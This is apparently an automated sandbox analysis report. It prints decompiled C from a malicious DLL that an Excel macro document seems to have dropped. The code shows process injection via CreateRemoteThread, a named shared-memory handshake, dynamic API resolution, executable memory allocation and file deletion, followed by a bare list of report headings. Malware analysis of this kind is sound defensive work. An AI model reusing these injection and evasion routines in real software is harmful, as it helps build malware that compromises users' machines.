lstrcmpiA.KERNEL32(10006250,?,?,?,?,?,?,?,?,771C2D2D,00000000,00000000,?,?,10006250,?), ref: 100063A7
lstrcmpiA.KERNEL32(10006250,?,?,?,?,?,?,?,?,771C2D2D,00000000,00000000,?,?,10006250,?), ref: 100063BF
lstrcmpiA.KERNEL32(10006250,10006250,?,?,?,?,?,?,?,771C2D2D,00000000,00000000,?,?,10006250,?), ref: 100063D7
lstrcmpiA.KERNEL32(10006250,?,?,?,?,?,?,?,?,771C2D2D,00000000,00000000,?,?,10006250,?), ref: 100063EF
lstrcmpiA.KERNEL32(10006250,10006250,?,?,?,?,?,?,?,771C2D2D,00000000,00000000,?,?,10006250,?), ref: 10006408
lstrlenA.KERNEL32(00000001,?,?,?,?,?,?,?,771C2D2D,00000000,00000000,?,?,10006250,?), ref: 10006413

Part of subcall function 10006B0C: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040), ref: 10006B4E

Memory Dump Source

Source File: 00000005.00000002.2025968768.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.2025954569.10000000.00000002.sdmp
Associated: 00000005.00000002.2025988629.10007000.00000002.sdmp
Associated: 00000005.00000002.2026009945.1000A000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd

Function 1000100E, Relevance: 7.5, APIs: 5, Instructions: 49
file

C-Code - Quality: 100%

			E1000100E(CHAR* _a4, void** _a8) {
				void* _t6;
				void* _t8;
				void* _t9;
				void** _t13;
				long _t14;

				_t14 = 0;
				_t6 = OpenFileMappingA(0xf001f, 0, _a4);
				_t13 = _a8;
				 *_t13 = _t6;
				if(_t6 != 0) {
					L4:
					_t14 = 1;
				} else {
					_t8 = CreateFileMappingA(0xffffffff, 0, 4, 0, 0x1000c, _a4);
					 *_t13 = _t8;
					if(_t8 != 0) {
						_t9 = MapViewOfFile(_t8, 0xf001f, 0, 0, 0);
						if(_t9 == 0) {
							CloseHandle( *_t13);
						} else {
							 *_t9 = 0;
							 *((intOrPtr*)(_t9 + 4)) = 0xff000;
							 *((intOrPtr*)(_t9 + 8)) = 0;
							UnmapViewOfFile(_t9);
							goto L4;
						}
					}
				}
				return _t14;
			}

0x10001017
0x10001020
0x10001026
0x10001029
0x1000102d
0x1000106b
0x1000106d
0x1000102f
0x1000103d
0x10001043
0x10001047
0x1000104e
0x10001056
0x10001077
0x10001058
0x10001059
0x1000105b
0x10001062
0x10001065
0x00000000
0x10001065
0x10001056
0x10001047
0x10001074

APIs

OpenFileMappingA.KERNEL32(000F001F,00000000,?), ref: 10001020
CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,0001000C,?), ref: 1000103D
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 1000104E
UnmapViewOfFile.KERNEL32(00000000), ref: 10001065
CloseHandle.KERNEL32(?), ref: 10001077

Memory Dump Source

Source File: 00000005.00000002.2025968768.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.2025954569.10000000.00000002.sdmp
Associated: 00000005.00000002.2025988629.10007000.00000002.sdmp
Associated: 00000005.00000002.2026009945.1000A000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd

Function 100016AA, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101
sleep

C-Code - Quality: 91%

			E100016AA(intOrPtr _a4, intOrPtr* _a8) {
				char _v8;
				char _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				void* __edi;
				void* _t25;
				void* _t30;
				long _t32;
				void* _t34;
				intOrPtr* _t43;
				char _t45;
				void* _t50;
				char _t53;
				char _t54;
				void* _t59;

				_t53 = 0;
				_t54 = 0;
				_v16 = 0;
				_v24 = 0;
				_v28 = 0;
				_t25 = E10002B64(0, _t59,  &_v28);
				_t41 = _t25;
				if(_t25 != 0) {
					_v12 = 0;
					E10001399(_t41,  &_v12);
					_pop(_t45);
					if(_v12 != 0) {
						_t30 = E10001555(_t41, _v12, E100019FA, 0, 0);
						_v20 = _t30;
						if(_t30 == 0) {
							L11:
							E1000131E(_t45, _t41, _v12);
						} else {
							_t45 = 0;
							_v8 = 0;
							while(_t54 != 0x258) {
								Sleep(0xc8);
								_t54 = _t54 + 1;
								E100010D6("SNFIRNW",  &_v8);
								_t45 = _v8;
								if(_t45 == 0) {
									continue;
								}
								break;
							}
							if(_t45 != 0) {
								_t34 = E10002035(_t45, _a4);
								_pop(_t50);
								if(_t34 != 0) {
									E10001D56(_t50, _v8,  &_v24,  &_v16);
									_t53 = _v16;
								}
								E10001000(_v8);
								_pop(_t45);
							}
							_t32 = WaitForSingleObject(_v20, 0x1d4c0);
							CloseHandle(_v20);
							if(_t32 == 0) {
								goto L11;
							}
						}
					}
					E10002BD9(_t41);
					_t54 = _v24;
				}
				_t43 = _a8;
				if(_t43 != 0) {
					 *_t43 = _t53;
				}
				return _t54;
			}

0x100016b3
0x100016b8
0x100016ba
0x100016be
0x100016c1
0x100016c4
0x100016c9
0x100016ce
0x100016d7
0x100016dc
0x100016e2
0x100016e6
0x100016f7
0x100016ff
0x10001704
0x10001785
0x10001789
0x10001706
0x10001706
0x10001708
0x1000170b
0x10001718
0x10001721
0x10001728
0x1000172f
0x10001734
0x00000000
0x00000000
0x00000000
0x10001734
0x10001738
0x1000173e
0x10001744
0x10001747
0x10001754
0x10001759
0x1000175c
0x10001762
0x10001767
0x10001767
0x10001770
0x1000177b
0x10001783
0x00000000
0x00000000
0x10001783
0x10001704
0x10001791
0x10001796
0x10001799
0x1000179a
0x1000179f
0x100017a1
0x100017a1
0x100017ab

APIs

Part of subcall function 10001399: CreateRemoteThread.KERNEL32(00000000,00000000,00000000,-10001545,00000000,00000000,00000000), ref: 100014E7
Part of subcall function 10001399: WaitForSingleObject.KERNEL32(00000000,00007530), ref: 100014F9
Part of subcall function 10001399: GetExitCodeThread.KERNEL32(00000000,00000000), ref: 10001504

Part of subcall function 10001555: CreateThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000157F
Part of subcall function 10001555: GetExitCodeProcess.KERNEL32(00000000,00000000), ref: 1000158F
Part of subcall function 10001555: CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 100015BE

Sleep.KERNEL32(000000C8,?,?,?,00000000,00000000,1000508E,?,00000000,00000000,00000000,00000000,?,?,10005D11,00000000), ref: 10001718

Part of subcall function 100010D6: OpenFileMappingA.KERNEL32(000F001F,00000000,?), ref: 100010E5

Part of subcall function 10001000: CloseHandle.KERNEL32(10001EC9), ref: 10001006

Part of subcall function 10001D56: Sleep.KERNEL32(000000C8,00000000,00000000,00000000,00000000,?,10001EBB,00000000,?,00000000,?,?,?,00000000,00000000,10005AC5), ref: 10001D78

WaitForSingleObject.KERNEL32(00000000,0001D4C0), ref: 10001770
CloseHandle.KERNEL32(00000000), ref: 1000177B

Part of subcall function 1000131E: GetExitCodeProcess.KERNEL32(00000000,00000000), ref: 1000133F

Strings

SNFIRNW, xrefs: 10001723

Memory Dump Source

Source File: 00000005.00000002.2025968768.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.2025954569.10000000.00000002.sdmp
Associated: 00000005.00000002.2025988629.10007000.00000002.sdmp
Associated: 00000005.00000002.2026009945.1000A000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd

Function 100017AC, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101
sleep

C-Code - Quality: 91%

			E100017AC(intOrPtr _a4, intOrPtr* _a8) {
				char _v8;
				char _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				void* __edi;
				void* _t25;
				void* _t30;
				long _t32;
				void* _t34;
				intOrPtr* _t43;
				char _t45;
				void* _t50;
				char _t53;
				char _t54;
				void* _t59;

				_t53 = 0;
				_t54 = 0;
				_v16 = 0;
				_v24 = 0;
				_v28 = 0;
				_t25 = E10002B64(0, _t59,  &_v28);
				_t41 = _t25;
				if(_t25 != 0) {
					_v12 = 0;
					E10001399(_t41,  &_v12);
					_pop(_t45);
					if(_v12 != 0) {
						_t30 = E10001555(_t41, _v12, E100018AE, 0, 0);
						_v20 = _t30;
						if(_t30 == 0) {
							L11:
							E1000131E(_t45, _t41, _v12);
						} else {
							_t45 = 0;
							_v8 = 0;
							while(_t54 != 0x258) {
								Sleep(0xc8);
								_t54 = _t54 + 1;
								E100010D6("SNFIRNW",  &_v8);
								_t45 = _v8;
								if(_t45 == 0) {
									continue;
								}
								break;
							}
							if(_t45 != 0) {
								_t34 = E10002035(_t45, _a4);
								_pop(_t50);
								if(_t34 != 0) {
									E10001D56(_t50, _v8,  &_v24,  &_v16);
									_t53 = _v16;
								}
								E10001000(_v8);
								_pop(_t45);
							}
							_t32 = WaitForSingleObject(_v20, 0x1d4c0);
							CloseHandle(_v20);
							if(_t32 == 0) {
								goto L11;
							}
						}
					}
					E10002BD9(_t41);
					_t54 = _v24;
				}
				_t43 = _a8;
				if(_t43 != 0) {
					 *_t43 = _t53;
				}
				return _t54;
			}

0x100017b5
0x100017ba
0x100017bc
0x100017c0
0x100017c3
0x100017c6
0x100017cb
0x100017d0
0x100017d9
0x100017de
0x100017e4
0x100017e8
0x100017f9
0x10001801
0x10001806
0x10001887
0x1000188b
0x10001808
0x10001808
0x1000180a
0x1000180d
0x1000181a
0x10001823
0x1000182a
0x10001831
0x10001836
0x00000000
0x00000000
0x00000000
0x10001836
0x1000183a
0x10001840
0x10001846
0x10001849
0x10001856
0x1000185b
0x1000185e
0x10001864
0x10001869
0x10001869
0x10001872
0x1000187d
0x10001885
0x00000000
0x00000000
0x10001885
0x10001806
0x10001893
0x10001898
0x1000189b
0x1000189c
0x100018a1
0x100018a3
0x100018a3
0x100018ad

APIs

Part of subcall function 10001399: CreateRemoteThread.KERNEL32(00000000,00000000,00000000,-10001545,00000000,00000000,00000000), ref: 100014E7
Part of subcall function 10001399: WaitForSingleObject.KERNEL32(00000000,00007530), ref: 100014F9
Part of subcall function 10001399: GetExitCodeThread.KERNEL32(00000000,00000000), ref: 10001504

Part of subcall function 10001555: CreateThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000157F
Part of subcall function 10001555: GetExitCodeProcess.KERNEL32(00000000,00000000), ref: 1000158F
Part of subcall function 10001555: CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 100015BE

Sleep.KERNEL32(000000C8,?,?,100053DE,00000000,00000000,10004E46,?,100053DE,00000000,00000000,00000000,?,100053DE,00000000,00000000), ref: 1000181A

Part of subcall function 100010D6: OpenFileMappingA.KERNEL32(000F001F,00000000,?), ref: 100010E5

Part of subcall function 10001000: CloseHandle.KERNEL32(10001EC9), ref: 10001006

Part of subcall function 10001D56: Sleep.KERNEL32(000000C8,00000000,00000000,00000000,00000000,?,10001EBB,00000000,?,00000000,?,?,?,00000000,00000000,10005AC5), ref: 10001D78

WaitForSingleObject.KERNEL32(100053DE,0001D4C0), ref: 10001872
CloseHandle.KERNEL32(100053DE), ref: 1000187D

Part of subcall function 1000131E: GetExitCodeProcess.KERNEL32(00000000,00000000), ref: 1000133F

Strings

SNFIRNW, xrefs: 10001825

Memory Dump Source

Source File: 00000005.00000002.2025968768.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.2025954569.10000000.00000002.sdmp
Associated: 00000005.00000002.2025988629.10007000.00000002.sdmp
Associated: 00000005.00000002.2026009945.1000A000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd

Function 10001E0C, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101
sleep

C-Code - Quality: 91%

			E10001E0C(intOrPtr _a4, intOrPtr* _a8) {
				char _v8;
				char _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				void* __edi;
				void* _t25;
				void* _t30;
				long _t32;
				void* _t34;
				intOrPtr* _t43;
				char _t45;
				void* _t50;
				char _t53;
				char _t54;
				void* _t59;

				_t53 = 0;
				_t54 = 0;
				_v16 = 0;
				_v24 = 0;
				_v28 = 0;
				_t25 = E10002B64(0, _t59,  &_v28);
				_t41 = _t25;
				if(_t25 != 0) {
					_v12 = 0;
					E10001399(_t41,  &_v12);
					_pop(_t45);
					if(_v12 != 0) {
						_t30 = E10001555(_t41, _v12, E10001F0E, 0, 0);
						_v20 = _t30;
						if(_t30 == 0) {
							L11:
							E1000131E(_t45, _t41, _v12);
						} else {
							_t45 = 0;
							_v8 = 0;
							while(_t54 != 0x258) {
								Sleep(0xc8);
								_t54 = _t54 + 1;
								E100010D6("SNFIRNW",  &_v8);
								_t45 = _v8;
								if(_t45 == 0) {
									continue;
								}
								break;
							}
							if(_t45 != 0) {
								_t34 = E10002035(_t45, _a4);
								_pop(_t50);
								if(_t34 != 0) {
									E10001D56(_t50, _v8,  &_v24,  &_v16);
									_t53 = _v16;
								}
								E10001000(_v8);
								_pop(_t45);
							}
							_t32 = WaitForSingleObject(_v20, 0x1d4c0);
							CloseHandle(_v20);
							if(_t32 == 0) {
								goto L11;
							}
						}
					}
					E10002BD9(_t41);
					_t54 = _v24;
				}
				_t43 = _a8;
				if(_t43 != 0) {
					 *_t43 = _t53;
				}
				return _t54;
			}

0x10001e15
0x10001e1a
0x10001e1c
0x10001e20
0x10001e23
0x10001e26
0x10001e2b
0x10001e30
0x10001e39
0x10001e3e
0x10001e44
0x10001e48
0x10001e59
0x10001e61
0x10001e66
0x10001ee7
0x10001eeb
0x10001e68
0x10001e68
0x10001e6a
0x10001e6d
0x10001e7a
0x10001e83
0x10001e8a
0x10001e91
0x10001e96
0x00000000
0x00000000
0x00000000
0x10001e96
0x10001e9a
0x10001ea0
0x10001ea6
0x10001ea9
0x10001eb6
0x10001ebb
0x10001ebe
0x10001ec4
0x10001ec9
0x10001ec9
0x10001ed2
0x10001edd
0x10001ee5
0x00000000
0x00000000
0x10001ee5
0x10001e66
0x10001ef3
0x10001ef8
0x10001efb
0x10001efc
0x10001f01
0x10001f03
0x10001f03
0x10001f0d

APIs

Part of subcall function 10001399: CreateRemoteThread.KERNEL32(00000000,00000000,00000000,-10001545,00000000,00000000,00000000), ref: 100014E7
Part of subcall function 10001399: WaitForSingleObject.KERNEL32(00000000,00007530), ref: 100014F9
Part of subcall function 10001399: GetExitCodeThread.KERNEL32(00000000,00000000), ref: 10001504

Part of subcall function 10001555: CreateThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000157F
Part of subcall function 10001555: GetExitCodeProcess.KERNEL32(00000000,00000000), ref: 1000158F
Part of subcall function 10001555: CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 100015BE

Sleep.KERNEL32(000000C8,?,?,?,00000000,00000000,10005AC5,?,?,00000000,00000000,00000000), ref: 10001E7A

Part of subcall function 100010D6: OpenFileMappingA.KERNEL32(000F001F,00000000,?), ref: 100010E5

Part of subcall function 10001000: CloseHandle.KERNEL32(10001EC9), ref: 10001006

Part of subcall function 10001D56: Sleep.KERNEL32(000000C8,00000000,00000000,00000000,00000000,?,10001EBB,00000000,?,00000000,?,?,?,00000000,00000000,10005AC5), ref: 10001D78

WaitForSingleObject.KERNEL32(?,0001D4C0), ref: 10001ED2
CloseHandle.KERNEL32(?), ref: 10001EDD

Part of subcall function 1000131E: GetExitCodeProcess.KERNEL32(00000000,00000000), ref: 1000133F

Strings

SNFIRNW, xrefs: 10001E85

Memory Dump Source

Source File: 00000005.00000002.2025968768.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.2025954569.10000000.00000002.sdmp
Associated: 00000005.00000002.2025988629.10007000.00000002.sdmp
Associated: 00000005.00000002.2026009945.1000A000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd

Function 10003274, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59
library

C-Code - Quality: 78%

			E10003274(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
				CHAR* _v8;
				void* __ecx;
				CHAR* _t13;
				CHAR* _t15;
				_Unknown_base(*)()* _t16;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t32;
				CHAR* _t33;
				struct HINSTANCE__* _t36;

				_push(_t25);
				_t23 = 0;
				_t13 = E10002F3F(_t25, 0x100071c4, 0xc);
				_t27 = _t32;
				_t33 = _t13;
				_t36 = GetModuleHandleA(_t33);
				if(_t36 != 0) {
					L2:
					_t15 = E10002F3F(_t27, 0x10007228, 0xe);
					_v8 = _t15;
					_t16 = GetProcAddress(_t36, _t15);
					if(_t16 != 0) {
						_t10 =  &_a8; // 0x44
						_t23 =  *_t16(_a4,  *_t10, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40);
					}
					E10003F0A(_v8);
				} else {
					_t36 = LoadLibraryA(_t33);
					if(_t36 != 0) {
						goto L2;
					}
				}
				E10003F0A(_t33);
				return _t23;
			}

0x10003277
0x10003282
0x10003284
0x1000328a
0x1000328b
0x10003294
0x10003298
0x100032a7
0x100032ae
0x100032b7
0x100032ba
0x100032c2
0x100032dc
0x100032e4
0x100032e4
0x100032e9
0x1000329a
0x100032a1
0x100032a5
0x00000000
0x00000000
0x100032a5
0x100032f0
0x100032fe

APIs

GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,?,?,10003A90,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044), ref: 1000328E
LoadLibraryA.KERNEL32(00000000), ref: 1000329B
GetProcAddress.KERNEL32(00000000,00000000,?,?,10003A90,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,10005D2A,00000000), ref: 100032BA

Strings

D*], xrefs: 100032DC

Memory Dump Source

Source File: 00000005.00000002.2025968768.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.2025954569.10000000.00000002.sdmp
Associated: 00000005.00000002.2025988629.10007000.00000002.sdmp
Associated: 00000005.00000002.2026009945.1000A000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd

Function 10001205, Relevance: 6.1, APIs: 4, Instructions: 92
filesleep

C-Code - Quality: 90%

			E10001205(long _a4, intOrPtr _a8, void _a12) {
				void* _t24;
				void _t32;
				long _t41;
				void _t43;
				void* _t45;
				void* _t47;

				_t24 = _a4;
				_t43 = 0;
				if(_t24 != 0 && _t24 != 0xffffffff) {
					_t45 = MapViewOfFile(_t24, 0xf001f, 0, 0, 0);
					if(_t45 != 0) {
						if( *((intOrPtr*)(_t45 + 4)) == 0xff000) {
							 *_t45 = _a12;
							_t41 = 0;
							 *((intOrPtr*)(_t45 + 4)) = 0x1234abcd;
							_a4 = 0;
							while(_t41 == 0) {
								Sleep(0xc8);
								_a4 = _a4 + 1;
								_push(1);
								_pop(1);
								_t41 =  ==  ? 1 : _t41;
								if( *((intOrPtr*)(_t45 + 4)) != 0xdcba4321) {
									continue;
								} else {
									if(_t41 == 0) {
										L16:
										while( *_t45 != _t43) {
											if(_t41 == 0) {
												_t32 =  *_t45;
												if(_t32 >= 0x10000) {
													 *(_t45 + 8) = 0x10000;
												} else {
													 *(_t45 + 8) = _t32;
												}
												_t12 = _t45 + 0xc; // 0xc
												E100030DF(_t12, _a8,  *(_t45 + 8));
												_t47 = _t47 + 0xc;
												_a8 = _a8 +  *(_t45 + 8);
												 *((intOrPtr*)(_t45 + 4)) = 0x98761234;
												_a4 = _t43;
												while(_t41 == 0) {
													Sleep(0xc8);
													_a4 = _a4 + 1;
													_push(1);
													_pop(1);
													_t41 =  ==  ? 1 : _t41;
													if( *((intOrPtr*)(_t45 + 4)) != 0x43216789) {
														continue;
													}
													goto L16;
												}
												continue;
											}
											break;
										}
										 *_t45 = _t43;
										 *(_t45 + 8) = _t43;
										 *((intOrPtr*)(_t45 + 4)) = 0xff000;
										_t43 =  ==  ? 1 : _t43;
									}
								}
								break;
							}
						}
						UnmapViewOfFile(_t45);
					}
				}
				return _t43;
			}

0x10001208
0x1000120c
0x10001210
0x1000122f
0x10001233
0x10001240
0x1000124a
0x1000124c
0x1000124e
0x10001255
0x10001258
0x10001265
0x10001274
0x10001277
0x10001279
0x1000127a
0x10001284
0x00000000
0x10001286
0x10001288
0x00000000
0x100012fb
0x10001292
0x10001294
0x1000129b
0x100012a2
0x1000129d
0x1000129d
0x1000129d
0x100012ac
0x100012b3
0x100012bb
0x100012c1
0x100012c6
0x100012ce
0x100012d1
0x100012da
0x100012e9
0x100012ec
0x100012ee
0x100012ef
0x100012f9
0x00000000
0x00000000
0x00000000
0x100012f9
0x00000000
0x100012d1
0x00000000
0x10001292
0x10001301
0x10001303
0x10001306
0x1000130d
0x1000130d
0x10001288
0x00000000
0x10001284
0x10001310
0x10001312
0x10001312
0x10001318
0x1000131d

APIs

MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000,00000001,00000000,?,10001DFE,00000000,00000000,10002170,?,10002170,00000000,00000000), ref: 10001229
Sleep.KERNEL32(000000C8,00000000,?,10001DFE,00000000,00000000,10002170,?,10002170,00000000,00000000,00000000,?,?,00000000,00000000), ref: 10001265
Sleep.KERNEL32(000000C8,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,10001EA5,00000000,00000000), ref: 100012DA
UnmapViewOfFile.KERNEL32(00000000,?,10001DFE,00000000,00000000,10002170,?,10002170,00000000,00000000,00000000,?,?,00000000,00000000,00000000), ref: 10001312

Memory Dump Source

Source File: 00000005.00000002.2025968768.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.2025954569.10000000.00000002.sdmp
Associated: 00000005.00000002.2025988629.10007000.00000002.sdmp
Associated: 00000005.00000002.2026009945.1000A000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd

Function 10004085, Relevance: 6.1, APIs: 4, Instructions: 54

APIs

VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,?,771CC486), ref: 100040E4
VerSetConditionMask.KERNEL32(00000000,?,?,?,771CC486), ref: 100040E8
VerSetConditionMask.KERNEL32(00000000,?,?,?,?,771CC486), ref: 100040EC
VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 10004115

Memory Dump Source

Source File: 00000005.00000002.2025968768.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.2025954569.10000000.00000002.sdmp
Associated: 00000005.00000002.2025988629.10007000.00000002.sdmp
Associated: 00000005.00000002.2026009945.1000A000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd

Function 10006B6F, Relevance: 6.0, APIs: 4, Instructions: 33
thread

C-Code - Quality: 100%

			E10006B6F(_Unknown_base(*)()** __ecx, intOrPtr* _a4) {
				struct _SECURITY_ATTRIBUTES* _t8;
				void* _t12;

				_t8 = 0;
				if( *__ecx != 0) {
					_t8 = 1;
					_t12 = CreateThread(0, 0,  *__ecx, 0, 0, 0);
					if(_t12 != 0) {
						WaitForSingleObject(_t12, 0xffffffff);
						CloseHandle(_t12);
					} else {
						 *_a4 = GetLastError();
					}
				}
				return _t8;
			}

0x10006b75
0x10006b79
0x10006b81
0x10006b8b
0x10006b8f
0x10006ba1
0x10006ba8
0x10006b91
0x10006b9a
0x10006b9a
0x10006bae
0x10006bb3

APIs

CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 10006B85
GetLastError.KERNEL32(?,10006530,00000000,00000000,00000000,00000000,00000000,?,10005D8F,00000000,00000000,00000000,00000000,?,?,00000000), ref: 10006B91
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 10006BA1
CloseHandle.KERNEL32(00000000), ref: 10006BA8

Memory Dump Source

Source File: 00000005.00000002.2025968768.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.2025954569.10000000.00000002.sdmp
Associated: 00000005.00000002.2025988629.10007000.00000002.sdmp
Associated: 00000005.00000002.2026009945.1000A000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd

Function 1000389C, Relevance: 6.0, APIs: 4, Instructions: 23

C-Code - Quality: 100%

			E1000389C(void** _a4) {
				void** _t12;

				_t12 = _a4;
				if( *_t12 != 0) {
					WaitForSingleObject( *_t12, 0xffffffff);
					CloseHandle( *_t12);
					CloseHandle(_t12[1]);
				}
				DeleteFileW( &(_t12[4]));
				E10003F0A(_t12);
				return 0;
			}

0x100038a0
0x100038a6
0x100038ac
0x100038b4
0x100038bd
0x100038bd
0x100038c7
0x100038ce
0x100038d8

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 100038AC
CloseHandle.KERNEL32(?), ref: 100038B4
CloseHandle.KERNEL32(?), ref: 100038BD
DeleteFileW.KERNEL32(?), ref: 100038C7

Memory Dump Source

Source File: 00000005.00000002.2025968768.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.2025954569.10000000.00000002.sdmp
Associated: 00000005.00000002.2025988629.10007000.00000002.sdmp
Associated: 00000005.00000002.2026009945.1000A000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_rundll32.jbxd

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report

Overview

General Information

Detection

Confidence

Classification

Analysis Advice

Signature Overview

AV Detection:

Cryptography:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

Software Vulnerabilities:

Networking:

Boot Survival:

Persistence and Installation Behavior:

Data Obfuscation:

Spreading:

System Summary:

HIPS / PFW / Operating System Protection Evasion:

Anti Debugging:

Malware Analysis System Evasion:

Hooking and other Techniques for Hiding and Protection:

Language, Device and Operating System Detection:

Behavior Graph

Simulations

Behavior and APIs

Antivirus Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

Yara Overview

Initial Sample

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Joe Sandbox View / Context

IPs

Domains

ASN

Dropped Files

Screenshot

Startup

Created / dropped Files

Contacted Domains/Contacted IPs

Contacted Domains

Contacted IPs

Static File Info

General

File Icon

Static OLE Info

General

OLE File "Upcoming Events February 2018.xls"

Indicators

Summary

Document Summary

Streams with VBA

VBA File Name: LinesOfBusiness.bas, Stream Size: 4661

General

VBA Code Keywords

VBA Code

VBA File Name: Module1.bas, Stream Size: 1048

General

VBA Code Keywords

VBA Code

VBA File Name: Sheet1.cls, Stream Size: 991

General

VBA Code Keywords

VBA Code

VBA File Name: ThisWorkbook.cls, Stream Size: 999

General